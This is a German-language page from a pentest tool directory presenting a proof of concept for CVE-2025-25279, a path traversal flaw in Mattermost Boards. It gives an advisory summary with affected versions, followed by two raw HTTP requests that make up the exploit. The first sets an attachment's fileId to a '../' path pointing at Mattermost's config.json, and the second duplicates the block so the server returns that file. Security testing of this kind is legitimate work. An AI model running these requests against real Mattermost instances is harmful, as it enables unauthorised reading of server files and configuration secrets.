Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-25279 — Proof-of-Concept für CVE-2025-25279: Path Traversal in Mattermost Boards ermöglicht das beliebige Lesen von Dateien über manipulierte Import-Archive und Board-Duplikation. | Kitploit
Tools/GitHubGitHub/numanturle/cve-2025-25279
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungFehlkonfiguration
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

Proof-of-Concept für CVE-2025-25279: Path Traversal in Mattermost Boards ermöglicht das beliebige Lesen von Dateien über manipulierte Import-Archive und Board-Duplikation.

Repository anzeigen
423vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Sicherheitshinweis MMSA-2025-00430 / CVE-2025-25279

Zusammenfassung

Nach dem Hochladen einer Datei in Mattermost Boards zeigt die Datei, wenn der fileId-Parameter geändert und das Board kopiert wird, nun auf die im Parameter angegebene Zieldatei und lädt diese herunter.

Betroffene Versionen: Mattermost-Instanzen mit aktivierten Boards CVE: CVE-2025-25279

Beschreibung

Die Mattermost-Versionen 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 validieren Board-Blöcke beim Import von Boards nicht ordnungsgemäß, was es einem Angreifer ermöglicht, über den Import und Export eines speziell präparierten Importarchivs in Boards eine beliebige Datei auf dem System zu lesen.

Screenshots

Screenshot 1 Screenshot 2 Screenshot 3 Screenshot 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


Referenzen

  • Mattermost Security Updates
  • CWE-200: Informationsoffenlegung
  • CVE-2025-25279

Die Anerkennung gebührt nicht mir, beinhaltet eine Überprüfung

Tool herunterladen